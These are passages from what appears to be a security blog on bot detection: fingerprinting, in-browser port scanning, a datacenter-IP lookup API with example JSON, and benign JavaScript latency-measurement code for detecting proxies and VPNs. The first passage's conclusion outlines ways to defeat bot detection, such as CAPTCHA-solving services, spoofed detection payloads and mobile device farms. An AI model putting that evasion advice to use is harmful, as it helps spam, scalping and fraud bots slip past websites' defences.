<li>Browser Fingerprinting with JavaScript is a very popular method. The idea is to collect as much browser entropy such as <code>navigator.languages</code> or <code>navigator.platform</code> as possible, while simultaneously trying to look for attributes that are static and don't change on browser/OS updates.</li>
<li>Proof of work challenges such as solving cryptographic puzzles in the browser as for example <a href="https://friendlycaptcha.com/">friendlycaptcha.com</a> is doing it. The rough idea is: Make the browser find the input for a hash function until the first <code>K</code> bits are all zeroes. This takes some time.</li>
<li>Another common bot detection method is to produce unique fingerprints with the browser built in webGL rendering system that accesses the client's graphic hardware. For example, <a href="https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/45581.pdf">Google Picasso</a> detects the client's operating system class by leveraging the unique outputs of the webGL renderer. They deliberately only want to reliably detect the device/operating system, simply because most spammers/botters use cheap cloud/hosting infrastructure which are mostly Linux flavors.</li>
<li>JavaScript can be used to <a href="https://incolumitas.com/2021/01/10/browser-based-port-scanning/">port scan</a> the client's internal network. This allows to find out if certain suspicious well known ports are open, such as the one for the remote debugging protocol (9222) or the one for <code>adb</code> (5037). Furthermore, this also allows to check if the client has a router accessible by scanning for <code>192.168.1.1</code>.</li>
<li>Recording behavioral data by listening to DOM events such as <code>onmousemove</code>, <code>onscroll</code>, <code>onkeydown</code>.</li>
<li>Then there exist a wide range of techniques to detect automation frameworks such as puppeteer or playwright or mismatches in the browser JavaScript environment which indicate that the browser was messed with. <a href="https://abrahamjuliot.github.io/creepjs/">creep.js</a> is probably one of the best tools out there for that purpose.</li>
<li>Lastly, the technique that is still most used is the good old CAPTCHA. Google's <a href="https://www.google.com/recaptcha/about/">reCAPTCHA</a> or the newer <a href="https://www.hcaptcha.com/">hCAPTCHA</a> are well known solutions.</li>
<li>In general, JavaScript allows bot detection services to collect and ENORMOUS amount of data from browsers. JavaScript leaks so much information, it's unfathomable. Just to throw some words into the mix: Browser red pills, WebRTC leaks, scanning the internal network...</li>
</ol>
<p>The <strong>Proof of Work</strong> kind of challenges cannot be bypassed by clients. They have to be solved somewhere. However, the solving of the proof of work challenge does not have to be on the browser/client that receives the challenge.</p>
<p>Crypto proof of work challenges can be solved by dedicated hardware for cryptography, it does not need to be solved by the browser. This speeds up things considerably. I would guess that solving crypto hashing challenges on dedicated hardware is between 20 to 200 times faster than with JavaScript.</p>
<p>Solving captchas such as Google's <a href="https://www.google.com/recaptcha/about/">reCAPTCHA</a> can be outsourced to captcha solving services, such as for example <a href="https://www.deathbycaptcha.com/">deathbycaptcha.com</a> or <a href="https://2captcha.com/">2captcha.com</a>.</p>
<p>Even solving more complex challenges such as <a href="https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/45581.pdf">Google Picasso</a> can be pre-computed. All what you need is a network of different devices and access to a browser with JavaScript enabled. If you have a website with 10k unique visitors per month, you probably will be fine.</p>
<h2>Conclusion</h2>
<p>Bot detection systems consists of IP reputation techniques and client side data gathering scripts. They need to reliably work even if their client side JavaScript libraries send spoofed data.</p>
<p>Because of that potential spoofing, bot detection <a href="https://incolumitas.com/data/imperva.js">JavaScript libraries</a> are heavily obfuscated to make it harder for attackers to understand how they work. Proof of work challenges do not have to be solved by the client that received the challenge - they can be outsourced.</p>
<p>There are two fundamental approaches how to defeat bot detection:</p>
<ol>
<li>Don't participate in the cat and mouse race between bot detection companies and botters and use real devices with legit IP addresses (such as mobile device farms) to conduct your attacks. This is very costly in terms of hardware and data plans.</li>
<li>Use cheap AWS cloud infrastructure and high reputation proxies and then spoof the JavaScript payload from the bot detection JavaScript in order to appear legit. This requires a very high understanding of JavaScript and reverse engineering and is thus very costly regarding time and expertise. </li>
</ol>
<p>Only one thing is for sure: All what bot detection companies are doing is <strong>rising the transaction costs for automation in the Internet</strong>. But we live in times were platforms are becoming more monopolized and powerful each passing day.</p>
<p>At the same time, mobile phones become cheaper and cheaper. In our modern times, a mobile phone basically constitutes a digital identity. But all what you need to acquire such an identity is 100USD to buy a cheap phone and a cheap data plan for 7.99USD a month. If bot detection companies do their job too good, spammers will simply create mobile device farms and conduct their botting/spamming/attacks with those device farms.</p>
<p>Detecting real automated mobile devices is much much harder then to detect Headless Chrome on AWS...As of now, I would only know two ways to detect such a mobile device farm:</p>
<ul>
<li>Portscan for an open <code>adb</code> port with JavaScript</li>
<li>Check the Javascript <a href="https://developer.mozilla.org/en-US/docs/Web/API/Accelerometer">Accelerometer API</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Gyroscope">Gyroscope</a>. Zero-movement velocity and rotation data is quite suspicious for mobile phones.</li>
<li>Maybe some statistical analysis that a website suddenly has a surge in traffic from cheap or old Android smartphones from the same CGNAT which might indicate a mobile device farm as source of the traffic...</li>
</ul>API to Check if an IP Address belongs to a Datacenter / Cloud Provider2021-06-20T17:45:00+02:002021-06-20T17:45:00+02:00Nikolai Tschachertag:incolumitas.com,2021-06-20:/2021/06/20/check-if-an-IP-Address-belongs-to-a-datacenter/<p>For security reasons, it's often helpful to check if an IP Address belongs to a datacenter or cloud computing provider such as Amazon AWS or Microsoft Azure. Therefore, I have developed a simple public API that helps you to check if an IP address belongs to a datacenter / cloud provider.</p><p><a class="orange_button" href="https://incolumitas.com/pages/Datacenter-IP-API/">Visit the dedicated page for the API</a></p>
<h2>Introduction</h2>
<p>The emergence of cloud providers enabled bot programmers and spammers to make use of cheap and scalable cloud computing infrastructure for their bots. As a business and website owner, it's in your best interest that your visitors are organic human beings and not automated programs that leverage the functionality of your website.</p>
<p>Consider the scenario where you own a ecommerce business and you want to sell a limited edition of your product and you know in advance that the demand for the product will far outnumber the supply (As it happened with the <a href="https://www.businessinsider.com/playstation-5-launch-day-us-europe-flooded-by-reseller-bots-2020-11">Playstation 5 release</a>).</p>
<p>Those bots are called <strong>resell bots</strong> and they buy your limited edition product as soon as it appears on the page in order to resell it later on Ebay for a higher price.</p>
<p>But there are much more use cases for malicious bots: Adfraud, scraping bots, price/stock monitoring bots, credential stuffing bots and many other use cases.</p>
<p>Often those bots are hosted on Amazon AWS, Digitalocean or Hetzner cloud computing infrastructure (To name a few hosting providers).</p>
<p>When you can infer that the IP address of a visitor on your website belongs to a datacenter / cloud provider you can decide to block this IP.</p>
<p><strong>Put differently:</strong> What normal human being is using a cloud provider IP address when browsing the Internet?</p>
<h2>API for IP Address Datacenter / Cloud Provider Check</h2>
<p>Now it's time to introduce the API that allows you to check if a certain IP belongs to a datacenter / cloud provider.</p>
<p>You can reach the API endpoint with this URL: <strong>https://abs.incolumitas.com/datacenter?ip=</strong></p>
<p>If you pass the IP address <code>3.5.140.2</code> to the API by calling <a href="https://abs.incolumitas.com/datacenter?ip=3.5.140.2">https://abs.incolumitas.com/datacenter?ip=3.5.140.2</a>, you'll obtain the result:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"3.5.140.2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"region"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-northeast-2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AMAZON"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"network_border_group"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-northeast-2"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Alternatively, you can also lookup IPv6 addresses. Try the url <a href="https://abs.incolumitas.com/datacenter?ip=2406:dafe:e0ff:ffff:ffff:ffff:dead:beef">https://abs.incolumitas.com/datacenter?ip=2406:dafe:e0ff:ffff:ffff:ffff:dead:beef</a>, which yields:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2406:dafe:e0ff:ffff:ffff:ffff:dead:beef"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"region"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-east-1"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AMAZON"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"network_border_group"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-east-1"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>If you don't specify any IP address with the <code>ip=</code> query parameter and you invoke <a href="https://abs.incolumitas.com/datacenter">https://abs.incolumitas.com/datacenter</a> directly, the client's own IP address will be used for lookup. In my case, I get the following output:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.155.231.57"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"No match for this IP address"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>because my private ISP IP address obviously doesn't belong to a datacenter.</p>
<p>Usage with JavaScript:</p>
<div class="highlight"><pre><span></span><code><span class="nx">fetch</span><span class="p">(</span><span class="s1">'https://abs.incolumitas.com/datacenter'</span><span class="p">)</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="nx">response</span> <span class="p">=></span> <span class="nx">response</span><span class="p">.</span><span class="nx">json</span><span class="p">())</span>
<span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span>
<span class="p">})</span>
</code></pre></div>
<p>The IP address ranges for the cloud providers are kept up to date and the IP ranges are pulled from the upstream sources every 4 hours.</p>
<h4>More Examples for the IP Address Datacenter API</h4>
<p>In the following section, I will show examples for looking up IP addresses belonging to the three biggest cloud providers AWS, Azure and GCP:</p>
<p>Looking up an Azure IP address: <a href="https://abs.incolumitas.com/datacenter?ip=20.41.193.225">https://abs.incolumitas.com/datacenter?ip=20.41.193.225</a></p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"20.41.193.225"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AzurePortal"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"region"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"regionId"</span><span class="p">:</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"platform"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Azure"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"systemService"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AzurePortal"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Looking up an AWS IP address: <a href="https://abs.incolumitas.com/datacenter?ip=3.5.140.2">https://abs.incolumitas.com/datacenter?ip=3.5.140.2</a></p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"3.5.140.2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"region"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-northeast-2"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AMAZON"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"network_border_group"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ap-northeast-2"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Looking up an GCP IP address: <a href="https://abs.incolumitas.com/datacenter?ip=23.236.48.55">https://abs.incolumitas.com/datacenter?ip=23.236.48.55</a></p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"23.236.48.55"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"GCP"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>And looking up a AWS IPv6 address: <a href="https://abs.incolumitas.com/datacenter?ip=2600:1F18:7FFF:F800:0000:ffff:0000:0000">https://abs.incolumitas.com/datacenter?ip=2600:1F18:7FFF:F800:0000:ffff:0000:0000</a>:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"ip"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2600:1F18:7FFF:F800:0000:ffff:0000:0000"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"region"</span><span class="p">:</span><span class="w"> </span><span class="s2">"us-east-1"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"service"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AMAZON"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"network_border_group"</span><span class="p">:</span><span class="w"> </span><span class="s2">"us-east-1"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>As you can see from the example lookups above, sometimes the API gives additional meta data information for a specific IP address such as regional and data center information.</p>
<h2>What cloud providers are supported by the API?</h2>
<p>Currently, the API supports IP address ranges from the following <a href="https://udger.com/resources/datacenter-list">cloud providers</a>:</p>
<table>
<thead>
<tr>
<th>Cloud Provider</th>
<th>Number of IP Addresses</th>
<th>API support</th>
</tr>
</thead>
<tbody>
<tr>
<td>Amazon AWS</td>
<td>124,353,848</td>
<td>✓</td>
</tr>
<tr>
<td>Microsoft Azure</td>
<td>12,175,189</td>
<td>✓</td>
</tr>
<tr>
<td>Google Cloud</td>
<td>13,257,728</td>
<td>✓</td>
</tr>
<tr>
<td>Alibaba Cloud</td>
<td>7,303,168</td>
<td>✗</td>
</tr>
<tr>
<td>SoftLayer Technologies / IBM Cloud</td>
<td>4,841,056</td>
<td>✓</td>
</tr>
<tr>
<td>Tencent Cloud</td>
<td>4,704,256</td>
<td>✗</td>
</tr>
<tr>
<td>OVH</td>
<td>4,200,608</td>
<td>✓</td>
</tr>
<tr>
<td>Digital Ocean, Inc</td>
<td>2,643,216</td>
<td>✓</td>
</tr>
<tr>
<td>Rackspace, Inc.</td>
<td>2,178,902</td>
<td>✗</td>
</tr>
<tr>
<td>Hetzner Online</td>
<td>2,022,193</td>
<td>✓</td>
</tr>
<tr>
<td>CloudFlare Inc</td>
<td>1,801,984</td>
<td>✓</td>
</tr>
<tr>
<td>Aptum Technologies</td>
<td>1,786,472</td>
<td>✗</td>
</tr>
<tr>
<td>Ubiquity Hosting</td>
<td>1,443,840</td>
<td>✗</td>
</tr>
<tr>
<td>Oracle Cloud</td>
<td>1,183,744</td>
<td>✓</td>
</tr>
<tr>
<td>Tor Network</td>
<td>?</td>
<td>✓</td>
</tr>
</tbody>
</table>
<p>The API database is updated every 4 hours with the official source of the IP address ranges of the cloud provides listed above (with a ✓). For some cloud providers such as OVH or Hetzner there is no official IP address range source, so I have to rely on <a href="https://bgp.he.net/search?search%5Bsearch%5D=OVH&commit=Search">third party sources</a>.</p>Detecting Proxies and VPN's with Latency Measurements2021-06-07T20:00:00+02:002021-06-13T20:00:00+02:00Nikolai Tschachertag:incolumitas.com,2021-06-07:/2021/06/07/detecting-proxies-and-vpn-with-latencies/<p>VPN's and Proxy Servers can be detected by comparing latencies measured with JavaScript in the browser with the corresponding latency of the TCP/IP handshake on the server.</p><h2>TL;DR</h2>
<p>When collecting enough samples from latency measurements taken </p>
<ol>
<li>From within the browser with WebSockets by using JavaScript</li>
<li>And on the server side by measuring the RTT on the incoming TCP/IP handshake</li>
</ol>
<p>it is possible for a website to infer that the visitor is using a proxy/VPN if those two latency measurements differ significantly.</p>
<h2>Introduction</h2>
<p><strong>Premise:</strong> I am the owner of a hosted website and I have full control of my server (root rights). My server is not behind a load balancer or some other mechanism that prevents me from hooking into the incoming TCP/IP stream.</p>
<p><strong>Goal:</strong> For each visitor of my site, I want to detect whether some tunneling protocol such as a proxy server (socks, https, ...) or a VPN service is being used. Why? Because a lot of spammers and scrapers use proxies and VPN's to hide their true IP address from websites.</p>
<p><strong>Visually:</strong> </p>
<figure>
<img src="https://incolumitas.com/images/proxy-latency.png" alt="Proxy Latency" />
<figcaption>Instead of using a img tag, I ended up using WebSockets to measure the latency from the browser.</figcaption>
</figure>
<p>Put differently, I want to take two latency measurements and compare them.</p>
<ol>
<li>Latency from <strong>browser -> web server</strong>, measured with JavaScript from the browser</li>
<li>Latency from <strong>external IP -> web server</strong>, measured on incoming TCP/IP handshake</li>
</ol>
<p>The idea is very simple: A proxy server between browser and web server has the effect that the TCP/IP connection is split in half and two TCP/IP streams are created as a result. Only the latter TCP/IP stream (and it's source IP address) is then directly communicating to my server. My conjecture is: It's possible to measure significant timing differences between <strong>browser -> web server</strong> and <strong>external IP -> web server</strong>.</p>
<h2>First Idea: Browser Latency with XMLHttpRequest</h2>
<p>Good resources regarding latency measurement with the DOM and JavaScript:</p>
<ol>
<li><a href="https://www.smashingmagazine.com/2011/11/analyzing-network-characteristics-using-javascript-and-the-dom-part-1/">Analyzing Network Characteristics Using JavaScript And The DOM</a></li>
<li><a href="https://stackoverflow.com/questions/43821243/measure-network-latency-time-to-first-byte-from-the-client-with-javascript">Measure network latency (time to first byte) from the client with JavaScript</a></li>
</ol>
<p>Without much explanation, this is the JavaScript source code to obtain the latency from browser to web server I created in a first attempt. I collect 10 measurements and I use the median value.</p>
<div class="highlight"><pre><span></span><code><span class="kd">let</span> <span class="nx">N</span> <span class="o">=</span> <span class="mf">10</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">ping</span><span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">started</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">http</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">cacheBuster</span> <span class="o">=</span> <span class="s1">'?bust='</span> <span class="o">+</span> <span class="p">(</span><span class="ow">new</span> <span class="nb">Date</span><span class="p">()).</span><span class="nx">getTime</span><span class="p">()</span>
<span class="nx">url</span> <span class="o">+=</span> <span class="nx">cacheBuster</span><span class="p">;</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"GET"</span><span class="p">,</span> <span class="nx">url</span><span class="p">,</span> <span class="cm">/*async*/</span><span class="kc">true</span><span class="p">);</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">http</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ended</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">milliseconds</span> <span class="o">=</span> <span class="nx">ended</span> <span class="o">-</span> <span class="nx">started</span><span class="p">;</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nx">milliseconds</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="k">try</span> <span class="p">{</span>
<span class="nx">http</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span>
<span class="p">}</span> <span class="k">catch</span><span class="p">(</span><span class="nx">exception</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// this is expected</span>
<span class="p">}</span>
<span class="p">})</span>
<span class="p">}</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">promises</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><=</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">promises</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">ping</span><span class="p">(</span><span class="s2">"https://incolumitas.com"</span><span class="p">));</span>
<span class="p">}</span>
<span class="nb">Promise</span><span class="p">.</span><span class="nx">all</span><span class="p">(</span><span class="nx">promises</span><span class="p">).</span><span class="nx">then</span><span class="p">((</span><span class="nx">results</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">results</span><span class="p">.</span><span class="nx">sort</span><span class="p">((</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">=></span> <span class="nx">a</span> <span class="o">-</span> <span class="nx">b</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">median</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="kd">let</span> <span class="nx">m1</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="nx">results</span><span class="p">.</span><span class="nx">length</span> <span class="o">/</span> <span class="mf">2</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">m2</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">ceil</span><span class="p">(</span><span class="nx">results</span><span class="p">.</span><span class="nx">length</span> <span class="o">/</span> <span class="mf">2</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">results</span><span class="p">.</span><span class="nx">length</span> <span class="o">%</span> <span class="mf">2</span> <span class="o">==</span> <span class="mf">0</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">median</span> <span class="o">=</span> <span class="p">(</span><span class="nx">results</span><span class="p">[</span><span class="nx">m1</span><span class="p">]</span> <span class="o">+</span> <span class="nx">results</span><span class="p">[</span><span class="nx">m2</span><span class="p">])</span> <span class="o">/</span> <span class="mf">2</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">median</span> <span class="o">=</span> <span class="nx">results</span><span class="p">[</span><span class="nx">m1</span><span class="p">];</span>
<span class="p">}</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'median'</span><span class="p">,</span> <span class="nx">median</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'measurements'</span><span class="p">,</span> <span class="nx">results</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">})()</span>
</code></pre></div>
<p>The above code gives me the following result on <code>incolumitas.com</code>:</p>
<div class="highlight"><pre><span></span><code><span class="nx">median</span> <span class="mf">126.5</span>
<span class="nx">measurements</span> <span class="p">[</span><span class="mf">41.5</span><span class="p">,</span> <span class="mf">91.5</span><span class="p">,</span> <span class="mf">108.70000000298023</span><span class="p">,</span> <span class="mf">121.19999999925494</span><span class="p">,</span> <span class="mf">124.89999999850988</span><span class="p">,</span> <span class="mf">126.5</span><span class="p">,</span> <span class="mf">126.70000000298023</span><span class="p">,</span> <span class="mf">130.09999999776483</span><span class="p">,</span> <span class="mf">130.19999999925494</span><span class="p">,</span> <span class="mf">145.10000000149012</span><span class="p">,</span> <span class="mf">145.5</span><span class="p">]</span>
</code></pre></div>
<p>However, there is a big problem. Using the <code>XMLHttpRequest</code> API to measure latencies gives wrong results. A substantial part of the latency does not come from the round trip time, but from browser networking internal things such as </p>
<ul>
<li>Resource Scheduling</li>
<li>Queueing</li>
<li>Connection start such as stalling, DNS lookup (negligible), initial connection, SSL</li>
</ul>
<p>What we really want is the <code>Waiting (TTFB)</code> part. See the image below taken from the Dev Console network tab: </p>
<figure>
<img src="https://incolumitas.com/images/requestTiming.png" alt="Waiting (TTFB)" />
<figcaption>I am only interested in the Waiting (TTFB) part.</figcaption>
</figure>
<p>For that reason, the <code>XMLHttpRequest</code> technique is not very promising and I need to look for a more accurate technique to measure latencies in the browser.</p>
<h2>Second Idea: Browser Latency with WebSockets</h2>
<p>Upon realizing the latency measurements problems with the <code>XMLHttpRequest</code> technique from above, it's time to try out WebSockets in order to get more accurate latency (RTT) measurements with JavaScript.</p>
<p>I am not interested in the WebSocket connection establishment latency, I only want the latency between <code>socket.send()</code> and <code>socket.onmessage()</code> functions. All my WebSocket server does, is to send the message back. It's a simple echo server. On each <code>socket.send()</code>, I send the <code>performance.now()</code> relative timestamp to the server. That way, I can interpolate the latency when the server replies with a copy of the message.</p>
<p>The good thing with WebSockets: There is zero incentive to delay or stall WebSocket messages once the connection is established. This gives me accurate latency measurements.</p>
<p>This is the WebSocket latency measurement code and here is a link to the live test site: <a href="https://bot.incolumitas.com/ws-latency.html">https://bot.incolumitas.com/ws-latency.html</a>.</p>
<div class="highlight"><pre><span></span><code><span class="cp"><!doctype html></span>
<span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">charset </span><span class="o">=</span> <span class="s">"utf-8"</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">></span>WebSocket Latency Check<span class="p"></</span><span class="nt">title</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">name </span><span class="o">=</span><span class="s">"description"</span> <span class="na">content</span><span class="o">=</span><span class="s">"fu"</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">name </span><span class="o">=</span><span class="s">"author"</span> <span class="na">content</span><span class="o">=</span><span class="s">"NT"</span><span class="p">></span>
<span class="p"></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">pre</span> <span class="na">id</span><span class="o">=</span><span class="s">"data"</span><span class="p">></</span><span class="nt">pre</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span><span class="p">></span>
<span class="kd">function</span> <span class="nx">roundToTwo</span><span class="p">(</span><span class="nx">num</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="o">+</span><span class="p">(</span><span class="nb">Math</span><span class="p">.</span><span class="nx">round</span><span class="p">(</span><span class="nx">num</span> <span class="o">+</span> <span class="s2">"e+2"</span><span class="p">)</span> <span class="o">+</span> <span class="s2">"e-2"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">getLatencyWebSocket</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="kd">function</span> <span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">function</span> <span class="nx">median</span><span class="p">(</span><span class="nx">values</span><span class="p">){</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">values</span><span class="p">.</span><span class="nx">length</span> <span class="o">===</span><span class="mf">0</span><span class="p">)</span> <span class="k">return</span> <span class="mf">0</span><span class="p">;</span>
<span class="nx">values</span><span class="p">.</span><span class="nx">sort</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span><span class="nx">b</span><span class="p">){</span>
<span class="k">return</span> <span class="nx">a</span><span class="o">-</span><span class="nx">b</span><span class="p">;</span>
<span class="p">});</span>
<span class="kd">var</span> <span class="nx">half</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="nx">values</span><span class="p">.</span><span class="nx">length</span> <span class="o">/</span> <span class="mf">2</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">values</span><span class="p">.</span><span class="nx">length</span> <span class="o">%</span> <span class="mf">2</span><span class="p">)</span>
<span class="k">return</span> <span class="nx">values</span><span class="p">[</span><span class="nx">half</span><span class="p">];</span>
<span class="k">return</span> <span class="p">(</span><span class="nx">values</span><span class="p">[</span><span class="nx">half</span> <span class="o">-</span> <span class="mf">1</span><span class="p">]</span> <span class="o">+</span> <span class="nx">values</span><span class="p">[</span><span class="nx">half</span><span class="p">])</span> <span class="o">/</span> <span class="mf">2.0</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Create a Web Socket</span>
<span class="kd">const</span> <span class="nx">socket</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="s1">'wss://abs.incolumitas.com:5555/'</span><span class="p">);</span>
<span class="nx">socket</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">reject</span><span class="p">(</span><span class="nx">err</span><span class="p">.</span><span class="nx">toString</span><span class="p">());</span>
<span class="p">}</span>
